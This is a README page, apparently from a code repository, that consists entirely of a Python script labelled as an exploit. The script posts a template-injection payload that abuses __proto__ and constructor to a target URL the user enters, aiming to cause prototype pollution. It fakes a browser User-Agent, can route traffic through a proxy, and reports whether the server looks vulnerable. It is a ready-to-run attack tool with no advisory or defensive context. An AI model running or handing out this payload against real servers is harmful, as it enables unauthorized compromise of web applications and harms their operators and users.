README.md
Rendering markdown...
import requests
import json
import logging
# Setup logging
logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
def exploit(url, proxy=None, timeout=10):
# Payload to exploit Prototype Pollution
payload = {
"template": "{{#with __proto__}}{{#with constructor}}{{defineProperty 'polluted' this}}{{/with}}{{/with}}"
}
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
}
proxies = None
if proxy:
proxies = {
'http': proxy,
'https': proxy
}
try:
logging.info(f"Sending exploit to {url}...")
if proxies:
logging.info(f"Using proxy: {proxies}")
response = requests.post(url, data=json.dumps(payload), headers=headers, proxies=proxies, timeout=timeout)
if response.status_code == 200:
logging.info("Exploit executed successfully.")
# Try to parse as JSON for more accurate detection
try:
resp_json = response.json()
if 'polluted' in str(resp_json): # Check for pollution indicator
logging.warning("The server is vulnerable to prototype pollution!")
else:
logging.info("Server responded, but exploit did not seem to work.")
except json.JSONDecodeError:
# Fallback to text if not JSON
if 'polluted' in response.text:
logging.warning("The server is vulnerable to prototype pollution!")
else:
logging.info("Server responded, but exploit did not seem to work.")
else:
logging.error(f"Exploit failed with status code: {response.status_code}")
except requests.RequestException as e:
logging.error(f"Error: {e}")
if proxies:
logging.error("Check if proxy is running and accessible.")
if __name__ == "__main__":
target_url = input("Enter the target URL: ")
proxy_url = input("Enter proxy URL (leave blank if none): ").strip()
proxy = proxy_url if proxy_url else None
timeout_input = input("Enter timeout in seconds (default 10): ").strip()
timeout = int(timeout_input) if timeout_input.isdigit() else 10
exploit(target_url, proxy, timeout)